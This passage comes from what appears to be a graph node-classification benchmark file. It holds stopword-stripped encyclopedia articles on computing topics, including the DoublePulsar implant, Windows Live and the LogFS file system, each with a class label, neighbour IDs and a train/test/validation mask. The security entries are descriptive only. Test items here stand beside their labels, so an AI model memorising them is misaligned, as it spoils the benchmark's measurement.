dwnldid=2583 ct5880 chip relabeled es1371 may found cheap cards i.e sb creative vibra 128 pci creative ev1938 audiopci 64v virtually identical es1371/es1373 later cost reduced product",
    "neighbors": [
      5377,
      10369,
      10371,
      6153,
      8976,
      10360,
      8241,
      823,
      6971,
      2368,
      3142,
      5702,
      3272,
      9799,
      9166,
      4699,
      1247,
      8561,
      8945,
      10359,
      5368,
      10363,
      1660
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4700,
    "label": 8,
    "text": "Personyze:personyze personyze web 2.0 start-up company based tel aviv israel provides software service saas website personalization personyze founded november 2008 tel aviv israel yakov shabat danny hen within two years became leading personalization website providers facebook integration behavioral targeting personyze also provides analytics a/b testing june 2011 rapleaf announced partnership personyze allow use demographics database july 2011 introduced plugins content management systems wordpress joomla personyze criticized forbes contributing filter bubble technology sorts everything basis user activities may consequently present visitors portion content/offers excluding content/offers ever presented russian website- http //www.personyze.ru",
    "neighbors": [
      1353,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 4701,
    "label": 2,
    "text": "Sendo_X2:sendo x2 sendo x2 second series 60 mobile phone developed sendo announced smallest lightest series 60 mobile marketplace sendo x2 first music mobile announced good six months sony ericsson announced w800 walkman phone although phone announced shown 3gsm world congress cannes february 2005 x2 never made production sendo went administration matter weeks x2 due released led uk based mobile phone magazines publishing reviews phone knew sendo codename x2 development tobi",
    "neighbors": [
      7246,
      1083,
      6685,
      2259
    ],
    "mask": "Test"
  },
  {
    "node_id": 4702,
    "label": 2,
    "text": "ODBC_Administrator:odbc administrator odbc administrator 32-bit utility mac os x operating system administering odbc enables interaction odbc-compliant data sources features include connection pooling trace log creation odbc driver management among administration features although apple started including underlying iodbc libraries mac os x jaguar 10.2.x continued least macos high sierra 10.13.x apple included odbc administrator mac os x leopard 10.5.x temporarily made available separate download since removed mac os x snow leopard 10.6.x alternatives apple 32-bit odbc administrator include free open source 32-bit 64-bit iodbc administrator included iodbc sdk available extant versions mac os x 10.0.x 10.13.x",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      2901,
      1878,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 4703,
    "label": 4,
    "text": "DoublePulsar:doublepulsar doublepulsar backdoor implant tool developed u.s. national security agency nsa equation group leaked shadow brokers early 2017 tool infected 200,000 microsoft windows computers weeks used alongside eternalblue may 2017 wannacry ransomware attack variant doublepulsar first seen wild march 2016 discovered symantec sean dillon senior analyst security company risksense inc. first dissected inspected doublepulsar said nsa exploits 10 times worse heartbleed security bug use doublepulsar primary payload doublepulsar runs kernel mode grants cybercriminals high level control computer system installed uses three commands ping kill exec latter used load malware onto system",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      8288,
      8292,
      107,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      7855,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      4968,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      8692,
      507
    ],
    "mask": "Train"
  },
  {
    "node_id": 4704,
    "label": 8,
    "text": "Windows_Live:windows live windows live discontinued brand-name set web services software products microsoft part software plus services platform chief components brand name included web services exposed corresponding web apps several computer programs interact services specialized web services mobile devices according microsoft windows live way extend windows user experience windows vista welcome screen provides link download windows live messenger subscribe windows live onecare also windows mail windows photo gallery windows movie maker offered windows 7 became exclusive part windows live microsoft announced windows 8 would see windows live apps included right out-of-the-box would include built-in synchronization technologies powered onedrive skydrive windows live brand phased august 2012 microsoft released windows 8 manufacturing active windows live services remained active gradually renamed live domain however continues used urls many online microsoft sites addition windows live mainly aimed individuals microsoft brands properties live including windows live first announced november 1 2005 initial release several windows live properties rebranded enhanced microsoft msn set products services however msn still exists alongside windows live means delivering content opposed customized content communications may 2012 microsoft began renaming windows live services partly anticipation windows 8 integrates many windows live products services operating system following services part windows live still online services still use live branding url even though brand name dropped windows phone free online companion service windows phone mobile devices provides users free mobile phone back-up solution wirelessly synchronizing contacts calendar appointments photos onenote notebooks password-protected online portal users access manage information stored windows phone devices via online portal using microsoft account well accessing set features remotely ringing locking mapping erasing lost phones service integrates tightly windows live services including people calendar skydrive microsoft released windows live messenger application ios app store allows users mobile devices running ios communicate contacts via microsoft messenger service addition instant messaging functionalities application also allows users view messenger social feed view friends profile integrate hotmail photos windows live also provides customised services specifically created feature phones offered via three channels — client-based windows mobile supported mobile devices nokia phones web-based wap gprs-enabled mobile web browsers sms-based services bing replacement search engine live search originally named windows live search msn search prior part windows live family services windows live search occupied homepage live.com domain windows live services however march 21 2007 microsoft decided separate search developments windows live services family forming part live search ad platform part reorganization new search brand live search consolidated microsoft adcenter part microsoft platform systems division however microsoft recognised brand issue word live continued remain brand effort create new identity microsoft search services june 3 2009 live search officially rebranded bing live connect collection apis common controls allow developers deeper control offers access core windows live services data open easily accessible application programming interfaces apis live connect built standard web technologies oauth 2.0 representational state transfer rest javascript object notation json designed work technology device live connect unites previously separate apis windows live single api based industry standards specifications microsoft released several computer programs windows live brand summary included except windows live onecare freeware published software suite called windows essentials formerly windows live essentials essentials programs designed integrate well within windows windows live services onedrive outlook.com windows live onecare hand commercial consumers utility marketed software service licensing model windows live butterfly awards program formerly msn butterfly program program whose members given benefit new microsoft software test beta releases went public direct contact program managers windows live products microsoft initiated windows live butterfly program order recognize contributions made exemplary beta testers prospective 'butterflies selected windows live product team nominated term one year could renominated windows live butterfly program closed june 2009 windows live websites sport common theme different themes used sites phase product release called waves wave set online services desktop programs windows essentials web services labelled wave example hotmail wave 4 programs windows essentials usually called year number example windows live messenger 2011 original windows live applications services used visual theme known blue vapor flair theme longer exists current windows live properties public beta release windows live wave 2 suite wave refers group wave products released new visual theme released enable aero transparency effect windows vista theme longer exists current windows live properties microsoft released set new themes windows live wave 3 services allows users customize pages windows live using set pre-selected background pictures several themes dynamic change according time day current weather condition user theme remains use sites windows live admin center addition themes provided windows live wave 3 release windows live wave 4 provided additional themes users customise pages windows live several dynamic themes changes according time day weather conditions user location several newly added themes similar wallpapers originating windows 7 addition windows live wave 4 header features reorganised dynamic navigation menu displays number user current online contacts number unread e-mails well in-built windows live web messenger service allowing users connect microsoft messenger service facebook chat service chat online contacts browsing windows live properties using web browser theme remains use sites family safety windows live apps windows 8 designed metro-style user interface web services also feature new metro-style user interface stop using windows live names ui header contains pull-down element allow users easily switch outlook.com people calendar onedrive header color also changes depending web service user using exception outlook.com allow users customize header color according preference new interface also in-built messaging sidebar allow users view presence instant message audio call video call contacts messenger facebook chat well skype february 2014 wave 5 services office web apps consolidated rebranded office online windows live services renamed listed",
    "neighbors": [
      2945,
      4356,
      11524,
      10118,
      1417,
      2443,
      6797,
      782,
      1935,
      4624,
      11667,
      2196,
      10388,
      10900,
      3610,
      540,
      2589,
      11549,
      7456,
      5666,
      7970,
      1832,
      6827,
      1581,
      430,
      8753,
      3890,
      820,
      1077,
      2101,
      6709,
      8757,
      6972,
      4289,
      5057,
      9025,
      10053,
      5193,
      1098,
      9033,
      10957,
      2641,
      467,
      2004,
      4051,
      11221,
      11605,
      8798,
      735,
      3935,
      11103,
      10338,
      6628,
      9063,
      9448,
      617,
      6505,
      8681,
      10986,
      5875,
      254,
      8446,
      2046,
      7551
    ],
    "mask": "None"
  },
  {
    "node_id": 4705,
    "label": 3,
    "text": "Superman:_The_Man_of_Steel_(1989_video_game):superman man steel 1989 video game superman man steel 1989 video game based dc comics flagship character superman developed published uk software company tynesoft license first star software game split distinct levels including 3d flying overhead vertical scrolling side scrolling sections sections different almost like different games number sections depended format e.g part seven missing versions sections linked comic book graphics telling story first level pseudo-3d forward scrolling flying level similar space harrier superman en route metropolis s.t.a.r labs attacked darkseid para-demons part two set ship lois lane held hostage terrorists takes form side scrolling fighting game superman fighting terrorists reach free lois third part overhead view vertical scrolling section set space superman must escort space shuttle manned professor gorwin asteroid kryptonite field s.t.a.r lab satellite next section another side-scrolling level set inside satellite superman must battle faulty robot defence system mistaken superman enemy intruder fifth part set outside satellite another asteroid field approaches gameplay identical level three part six similar parts three five rather asteroids superman must fly enemy satellite disrupting signals s.t.a.r lab satellite way must battle darkseid mini-robots large boss robot part seven set outside enemy satellite identified belonging lex luthor superman uses telescopic sight identify attack weak spots avoiding satellite defences final part set inside lex satellite similar part four superman must battle defence robots side-scrolling level object game destroy 'geo-disruptor found end level tynesoft ported published first star boulder dash spy vs. spy acorn platforms uk looking licenses first star held home computer rights superman used tynesoft developed entirely new game many different computers possible versions released home computer platforms day including atari st amiga pc commodore 64 zx spectrum amstrad cpc msx bbc micro acorn electron version apple ii also created us market evidence ever published released game published first star us distributed capstone software 16-bit versions generally received moderately favourable reviews one praised game incorporation style comic book source found gameplay frustrating particularly play sub games sequence gave score 69 amiga version 66 atari st version amiga computing similarly praised look game also pointing top notch sound awarding overall score 62 reception 8-bit versions game much mixed still praising presentation graphics zzap 64 gave c64 version overall score 39 complaining lightweight nature sub games tedious multi-load particular problem loading tape lengthy load level start new game tape would need rewound correct position first level crash gave spectrum version 35 praise given sound even graphics version came criticism including matchstick figure representing superman sideways scrolling section electron user much positive acorn electron version giving overall score 8/10 still criticised multi-load frustrating gameplay",
    "neighbors": [
      9006,
      6129,
      10931,
      8444,
      9853
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4706,
    "label": 3,
    "text": "Gunship_(video_game):gunship video game gunship combat flight simulator video game developed published microprose 1986 game controlling simulated ah-64 apache helicopter players navigate missions attack enemy targets protect friendly forces commercially critically successful gunship followed gunship 2000 gunship game features missions seven regions including u.s. training southeast asia 1st air cavalry division central america 82nd airborne division middle east 101st airborne division western europe 3rd armored division selection region style enemies pilot assigned primary mission secondary mission could include objectives destroy enemy headquarters support friendly troops i.e destroy targets near friendly forces latter would easier mission battle would fought closer friendly lines pilot arms apache helicopter gunship usually selecting agm-114 hellfire air-to-ground missiles guided missiles destroy hard targets bunkers tanks ffars folding fin aerial rockets unguided rockets destroy soft targets infantry installations hedp high-explosive dual-purpose rounds 30 mm cannon all-purpose weapon maximum range 1.5 km central america middle east western europe aim-9 sidewinders would also standard equipment usually backup air-to-air weapon case cannon failure patient players might move short jumps crouching behind hills block enemy line sight suddenly popping attack aggressive players generally fly fast erratically evade enemy fire flying low deliver devastating cannon attacks close range since flight time component mission evaluation either method advantages latter however rather dangerous 1st line enemies whose fast reaction times cause chopper pummelled relentless fire enemy fire especially small caliber deflected armor cause systems damage enough damaging hits structural integrity fail causing general power failure manifests dual-engine flameout warranting emergency landing emergency landing seriously injured pilot enemy territory causes become missing action pilot lands without serious injury escape back base live fight another day defined time limit game player return number forward area resupply points rearmed refueled damage repaired returning home base end mission ideally pilot completes missions knocks targets makes back base within 20 minutes ending gunship promotions stop pilot makes colonel although continue amassing medals purple heart air medal bronze star silver star distinguished service cross medal honor retire final promotion brig general medals game prerequisites earning others requirement shooting two hinds one mission medal honor led believe possible earn earning lower medals repeated medals harder earn first one criteria winning medals based types targets destroyed number targets destroyed objectives met time elapsed sometimes whether pilot wounded real life medals game awarded posthumously microprose intended gunship simulate urban helicopter akin blue thunder found city graphics difficult instead used tools developed f-15 strike eagle create another military simulation game released 1986 pc dos atari st amiga commodore 64 fm towns msx pc-98 sharp x68000 zx spectrum gunship also ported sega mega drive u.s. gold 1993 however version game differed others featuring arcade-style gameplay horizontal shoot 'em stages gunship microprose third best-selling commodore game late 1987 sales surpassed 250,000 copies november 1989 info magazine gave gunship commodore 64 five stars five describing without qualification best combat flight simulator ever released 8-bit computer praising graphics weapons sound controls physics documentation magazine concluded prime computer gaming world stated reviewer heartily recommends gunship ... five-star rating highest well-deserved 1994 survey wargames magazine gave title three stars five stating initially released helicopter simulation gunship received origins award best screen graphics home computer game 1986 award best simulation game year according readers crash 1987 computer gaming world named gunship action game year 1988 game joined magazine hall fame games highly rated time readers 1996 magazine ranked 102nd best game time follow-up game gunship 2000 released microprose several platforms 1991 1996 successor gunship followed 1999 pc windows",
    "neighbors": [
      1120,
      9166,
      9006,
      10999,
      312
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4707,
    "label": 2,
    "text": "Tim_Bray:tim bray timothy william bray born june 21 1955 canadian software developer entrepreneur one co-authors original xml specification worked amazon web services since december 2014 previously google sun microsystems digital equipment corporation dec several start-ups bray born june 21 1955 alberta canada grew beirut lebanon returned canada attend school university guelph guelph ontario graduated 1981 bachelor science double majoring mathematics computer science 2009 would return guelph receive honorary doctor science degree tim described switch focus math computer science way math ’ worked like dog cs cs worked much less as—and learned got paid well fresh university bray joined digital equipment corporation dec toronto software specialist 1983 bray left dec microtel pacific research joined new oxford english dictionary oed project university waterloo 1987 manager time bray worked sgml technology would later become central open text corporation xml atom standardization work bray co-founded antarctica systems bray director web technologies sun microsystems early 2004 early 2010 joined google developer advocate 2010 focusing android identity left google march 2014 unwilling relocate silicon valley vancouver started working amazon web services december 2014 bray involved several entrepreneurial activities including tim bray served part-time ceo waterloo maple 1989–1990 waterloo maple developer popular maple mathematical software bray left new oed project 1989 co-found open text corporation two colleagues open text commercialised search engine employed new oed project bray recalled “ 1994 heard conference speaker say search engines would big internet five seconds pieces fell place head realized could build thing technology. ” thus 1995 open text released open text index one first popular commercial web search engines open text corporation publicly traded nasdaq symbol otex 1991 1996 bray held position senior vice president—technology bray along wife dr. lauren wood ran textuality successful consulting practice field web publishing technology contracted netscape 1999 along ramanathan v. guha part create new version meta content framework called resource description framework rdf used xml language 1999 founded antarctica systems vancouver british columbia canada-based company specializes visualization-based business analytics bray contributed several important standards technology particularly web standards world wide web consortium w3c invited expert world wide web consortium 1996 1999 bray co-edited xml xml namespace specifications halfway project bray accepted consulting engagement netscape provoking vociferous protests netscape competitor microsoft supported initial moves bring sgml web bray temporarily asked resign editorship led intense dispute working group eventually solved appointment microsoft jean paoli third co-editor 2001 bray wrote article called taxi future xml.com proposed means improve web client user experience web server system performance via transform-aggregate-send xml-interact architecture—this proposed system similar ajax paradigm popularized around 2005 2001 2004 served tim berners-lee appointee w3c technical architecture group october 2007 bray co-chairing paul hoffman atom-focused atompub working group internet engineering task force atom web syndication format developed address perceived deficiencies rss 2.0 format bray worked ietf json working group 2013 2014 serving editor rfc 7159 specification json data interchange format revised rfc 4627 highlighted interoperability best practices released march 2014 bray written many software applications including bonnie inspiration bonnie++ unix file system benchmarking tool lark first xml processor ape atom protocol exerciser",
    "neighbors": [
      2081,
      9665,
      4707,
      9762,
      10020,
      4840,
      1802,
      8558,
      7248,
      5492,
      119,
      124,
      9245,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 4708,
    "label": 6,
    "text": "LogFS:logfs logfs linux log-structured scalable flash file system intended use large devices flash memory written jörn engel part sponsored ce linux forum logfs introduced mainline linux kernel version 2.6.34 released may 16 2010 removed codebase merge window version 4.10 december 2016 unmaintained years seemingly unused logfs mature enough pass entire test suite subsequently included mainline linux kernel marked 'experimental version 2.6.34 released may 16 2010 however attract large user base removed kernel december 2016 logfs motivated difficulties jffs2 larger flash-memory drives logfs stores inode tree drive jffs2 requires scan entire drive mount cache entire tree ram larger drives scan take dozens seconds tree take significant amount main memory logfs avoids penalties work system running uses drive space holding inode tree logfs stores file inode tree drive means write file ancestor node tree must rewritten done wandering tree update lowest node tree i.e. data written first node written ascending tree root inode updated writing root last maintains atomicity update flash-memory block unit erasures usually larger file-system block logfs handles disparity packing multiple file-system blocks single flash-memory block sum entry end flash-memory block records data stored flash-memory block file-system blocks moved deleted erased used new data peak usage flash-memory drive necessary compact data flash-memory blocks full useful data accomplished garbage collection logfs garbage collection strategy relies file data placed certain way flash-memory blocks flash-memory block hold file data level inode tree logfs garbage collect top level trees using 1 empty flash-memory block garbage collect top 2 levels trees using 2 empty flash-memory blocks garbage collect n levels trees using n empty flash memory blocks algorithm exponential time worst case worst case rare algorithm requires reserving handful flash-memory blocks latest logfs source available logfs git tree",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      9836,
      7789,
      9333,
      6263,
      9335,
      7802,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      11431,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      2339,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      927,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 4709,
    "label": 3,
    "text": "Zoids:_The_Battle_Begins:zoids battle begins zoids battle begins 1986 battle simulation developed released europe zx spectrum amstrad cpc msx c64 personal computers martech licensed zoids toy manufacturer tomy players control human fused machine known spiderzoid human tasked reclaiming six parts large machine named zoidzilla parts captured enemy red zoids part reclaimed boost power player spiderzoid game well received magazines",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4710,
    "label": 7,
    "text": "Norton_Zone:norton zone norton zone cloud file sharing online backup tool service operated symantec used share sync access store backup data also allows file collaboration commenting norton zone accessible apps windows windows rt android mac ios platforms norton zone uses encrypted replicated cloud storage provides client-side encryption leading antivirus provider via norton antivirus software symantec distinguishes norton zone competition automatically scanning files malware viruses norton zone offered 5 gb storage free larger storage allocations via subscription june 3 2014 symantec announced norton zone would discontinued august 6 2014",
    "neighbors": [
      9569,
      6565,
      7739,
      10185,
      3629,
      6797,
      4623,
      7983,
      10161,
      5650,
      6643,
      7515,
      1049,
      2267
    ],
    "mask": "Test"
  },
  {
    "node_id": 4711,
    "label": 4,
    "text": "Sealing_wax:sealing wax sealing wax wax material seal melting hardens quickly paper parchment ribbons wire material forming bond difficult separate without noticeable tampering wax used verify something document unopened verify sender identity example signet ring decoration sealing wax used take impressions seals wax used seal letters close later 16th century envelopes sealing wax romans used bitumen purpose formulas vary major shift european trade indies opened middle ages sealing wax typically made beeswax venice turpentine greenish-yellow resinous extract european larch tree earliest wax uncoloured later wax coloured red vermilion 16th century compounded various proportions shellac turpentine resin chalk plaster colouring matter often vermilion red lead necessarily beeswax proportion chalk varied coarser grades used seal wine bottles fruit preserves finer grades documents situations large seals public documents beeswax used occasion sealing wax historically perfumed ambergris musk scents 1866 many colours available gold using mica blue using smalt verditer black using lamp black white using lead white yellow using mercuric mineral turpeth also known schuetteite green using verdigris users british crown assigned different colours different types documents today range synthetic colours available sealing wax available form sticks sometimes wick granules stick melted one end ignited blackened granules heated spoon normally using flame placed required usually flap envelope wax still soft seal preferably temperature wax best impression quickly firmly pressed released modern day brought sealing wax new level use application traditional sealing wax candles produced canada spain france italy scotland formulations similar used historically since advent postal system use sealing wax become ceremony security modern times required new styles wax allowing mailing seal without damage removal new waxes flexible mailing referred glue-gun sealing wax faux sealing wax flexible sealing wax",
    "neighbors": [
      1821
    ],
    "mask": "Test"
  },
  {
    "node_id": 4712,
    "label": 2,
    "text": "New_Executable:new executable new executable abbreviated ne newexe 16-bit .exe file format successor dos mz executable format used windows 1.0–3.x multitasking ms-dos 4.0 os/2 1.x os/2 subset windows nt version 5.0 windows 2000 ne also called segmented executable first product released using new executable format windows 1.0 1985 followed 1986 multitasking ms-dos 4.0 separate branch ms-dos development released mainstream ms-dos versions 3.2 3.3 sometimes referred european ms-dos 4.0 os/2 1.0 released 1987 target operating system field file header reserves value 01 os/2 02 windows suggesting format designed os/2 already mind joint development agreement ibm microsoft os/2 signed august 1985 months windows 1.0 released november 1985 portable executable pe format replaced ne format 32-bit 64-bit versions windows linear executables lx replaced ne 32-bit programs os/2 designed 16-bit oses ne executables run 32-bit windows beginning windows vista icon resources inside new executables extracted shown even 32-bit shell 64-bit versions windows completely lack native support running ne executables 64-bit windows run 16-bit programs processor without help emulator due rare fairly complex nature files .exe packers support winlite packwin pklite 2.01 slr optloader nelite os/2 ne format also still used non-executable container codice_1 microsoft windows bitmapped fonts new ne linear lx portable pe executables retain dos mz format file header backward compatibility dos run dos so-called dos stub executed usually prints message exits constitutes minimal form called fat binary windows 1.0 executables however file header formatted way dos refuses run program large fit memory error message see windows 1.0 features",
    "neighbors": [
      10176,
      1922,
      6664,
      5225,
      6921,
      2380,
      6797,
      8301,
      7983,
      2672,
      8976,
      3410,
      2804,
      5557,
      3386,
      1501,
      2942,
      8959
    ],
    "mask": "None"
  },
  {
    "node_id": 4713,
    "label": 1,
    "text": "Schema-agnostic_databases:schema-agnostic databases schema-agnostic databases vocabulary-independent databases aim supporting users abstracted representation data supporting automatic semantic matching queries databases schema-agnosticism property database mapping query issued user terminology structure automatically mapping dataset vocabulary increase size semantic heterogeneity database schemas bring new requirements users querying searching structured data scale become unfeasible data consumers familiar representation data order query center discussion semantic gap users databases becomes central scale complexity data grows evolution data environments towards consumption data multiple data sources growth schema size complexity dynamicity decentralisation scodd schemas increases complexity contemporary data management scodd trend emerges central data management concern big data scenarios users applications demand complete data produced independent data sources different semantic assumptions contexts use typical scenario semantic web data applications evolution databases direction heterogeneous data environments strongly impacts usability semiotics semantic assumptions behind existing data accessibility methods structured queries keyword-based search visual query systems schema-less databases containing potentially millions dynamically changing attributes becomes unfeasible users become aware 'schema vocabulary order query database scale effort understanding schema order build structured query become prohibitive schema-agnostic queries defined query approaches structured databases allow users satisfying complex information needs without understanding representation schema database similarly tran et al defines search approaches require users know schema underlying data approaches keyword-based search databases allow users query databases without employing structured queries however discussed tran et al points users however navigation exploration address complex information needs unlike keyword search used web focuses simple needs keyword search elaborated used obtain complex results instead single set resources goal compute complex sets resources relations development approaches support natural language interfaces nli databases aimed towards goal schema-agnostic queries complementarily approaches based keyword search targeted keyword-based queries express complex information needs approaches explored construction structured queries databases schema constraints relaxed approaches natural language keyword-based search structured queries targeted different degrees sophistication addressing problem supporting flexible semantic matching queries data vary completely absence semantic concern principled semantic models demand schema-agnosticism implicit requirement across semantic search natural language query systems structured data sufficiently individuated concept necessary requirement contemporary database management systems recent works started define model semantic aspects involved schema-agnostic queries consist schema-agnostic queries following syntax structured standard example sql sparql syntax semantics operators maintained different terminologies used maps following sparql query dataset vocabulary maps following sparql query dataset vocabulary consist schema-agnostic queries using keyword queries case syntax semantics operators different structured query syntax 2016 concept schema-agnostic queries developed primarily academia schema-agnostic query systems investigated context natural language interfaces databases semantic web works explore application semantic parsing techniques large heterogeneous schema-less databases recently individuation concept schema-agnostic query systems databases appeared explicitly within literature freitas et al provide probabilistic model semantic complexity mapping schema-agnostic queries",
    "neighbors": [
      11457,
      6629,
      10413,
      8046,
      10452,
      2901,
      1174
    ],
    "mask": "Test"
  },
  {
    "node_id": 4714,
    "label": 1,
    "text": "FloraBase:florabase florabase public access web-based database flora western australia provides authoritative scientific information 12,978 taxa including descriptions maps images conservation status nomenclatural details 1,272 alien taxa naturalised weeds also recorded system takes data datasets including census western australian plants western australian herbarium specimen database nearly 725,000 vouchered plant collections operated western australian herbarium within department parks wildlife established november 1998 distribution guide uses combination ibra version 5.1 john stanley beard botanical provinces",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4715,
    "label": 4,
    "text": "Merritt_method:merritt method overwrite session consists lead-in random write patterns followed patterns 2-3 executed random order lead-out one random patterns followed 00000000 another random drive written passes even though table shows bit patterns passes specifically targeted encoding scheme end result obscure data drive advanced physical scanning e.g using magnetic force microscope drive likely able recover data series patterns follows",
    "neighbors": [
      3880
    ],
    "mask": "None"
  },
  {
    "node_id": 4716,
    "label": 3,
    "text": "Hang-On:hang-on game also built versions master system title derived biker turning hang bike bike leaning suzuki read japanese bike magazine though suzuki learned later technique called hang north america nevertheless chose keep former name 1995 interview suzuki said felt hang-on impressive game time release master system version also came two different compilation cartridges one astro warrior one safari hunt using behind motorcycle perspective player races linear race track divided several stages within limited time reaching checkpoint end stage extends time limit game ends time runs race finished arcade game contains in-game billboards bridgestone desert dueler tires shell garelli motorcycles tag john player special cigarettes forum cigarettes marbor obvious parody marlboro cigarettes arcade flyer features bike marlboro colors sponsored yamaha yzr500 world championships mid late 1980s would controversy cigarette ads games marketed children upon release another sega racing game super monaco gp 1989 three arcade cabinet designs—the usual upright machine handlebar brake levers instead joystick buttons upright machine addition seat third version looked roughly like real motorcycle steer player leaned tilt bike steered in-game bike screen mounted windshield area bike sg-1000-exclusive sequel hang-on ii released 1985 though essentially port original game modified work within limitations console hardware 1987 followed sequel super hang-on arcade later range platforms including sega genesis zx spectrum commodore 64 amstrad cpc commodore amiga atari st. polygon based sequel developed genki released sega saturn named variously hang-on gp '95 japan hang-on gp usa hang-on gp '96 europe power drift motorcycle hidden vehicle accessed finishing first place five tracks courses c e. playable extra stage sonic riders hang-on gear super hang-on gear bought shop one playing respective music racing. gear unlockable form sit-down arcade cabinet however collecting 100 rings pressing button race changes gear main music sequel sit-down arcade cabinet outride crisis said game sonic free riders hang-on gear super hang-on gear bought shop original sonic riders shenmue shenmue ii feature hang-on mini-game well ability win miniature toy versions bikes gashapon machines xbox version shenmue ii playable xbox 360 crashes trying play hang-on sonic all-stars racing transformed ryo drives hang-on sit-down arcade cabinet water-based portions race daytona usa h.o entered high score table clip main theme hang-on play",
    "neighbors": [
      11690,
      3307,
      8300,
      9006,
      1776,
      5011,
      629,
      11452,
      11231
    ],
    "mask": "Test"
  },
  {
    "node_id": 4717,
    "label": 3,
    "text": "Socket_G1:socket g1 socket g1 also known rpga 988a socket g/rpga 989 sockets take socket g1/rpga 988a socket g2/rpga 988b packaged processors intel cpu socket line mobile core i7 successor core 2 line based intel nehalem architecture first available 1366-pin socket b like predecessor lga775 uses lga socket configuration later followed updated lga-1156 socket moved qpi pci-express controller northbridge onto cpu result lower pin count lga-1156 systems later socket g1 systems run dual-channel memory mode opposed triple-channel mode unique lga-1366 platform subsequent xeon sockets nehalem mobile variant released september 23 2009 form i7-720qm 820qm 920xm models followed i7-740qm 840qm 940xm models june 21 2010 newer cpus use new clarksfield core maintained 45 nm manufacturing process desktop-based nehalems nehalem received die shrink january 7 2010 core name westmere intel gma hd graphics ironlake core packaged onto cpu substrate integrated directly processor die goes create arrandale-based line current cpus use package core i7-6x0m series core i5-4x0m series core i5-5x0m series core i3-3x0m series finally pentium p6x00 series celeron p4x00 series released march 28 2010 however available socket g1 available bga package also known pga988 socket processors",
    "neighbors": [
      3588,
      3973,
      5386,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      6339,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      8035,
      10468,
      613,
      8552,
      1260,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 4718,
    "label": 4,
    "text": "Movieland:movieland movieland also known movieland.com moviepass.tv popcorn.net subscription-based movie download service subject thousands complaints federal trade commission washington state attorney general office better business bureau agencies consumers said held hostage repeated pop-up windows demands payment triggered free 3-day trial period many said never even heard movieland saw first pop-up movieland advertised service spyware personal information would need filled begin free trial federal trade commission ftc filed complaint movieland eleven defendants august 2006 charging engaged nationwide scheme use deception coercion extract payments consumers attorney general state washington also filed complaint charging movieland several defendants violating state computer spyware act consumer protection act movieland advertises movie download service using pop-up ads sites ads offer three-day free trial access members-only content including music news updated sports scores adult movies ads say forms fill need provide credit card number e-mail address making trial appear anonymous site homepage states spyware virus free extra charge site installs program mediapipe used access service movieland.com began operations sometime fall 2005 earlier consumer complaints began soon thereafter consumers claimed never signed free trial never used service never even heard movieland got first pop-up demand payment said found software computers downloading screensaver free utility company denied installed software stealthy means media coverage early january 2006 recounted consumer complaints mentioned several anti-spyware companies buying google advertisements boasting product ability remove movieland report updated february 20 2008 berkman center internet society harvard law school calls movieland mediapipe component badware fully disclose installing completely remove components 'obligations uninstall process modifies software without disclosure richard stiennon it-harvest referred movieland form ransomware due behaviour july 2008 mediapipe report still cited berkman center internet society harvard law school august 8 2006 ftc filed complaint united states district court obtain preliminary permanent 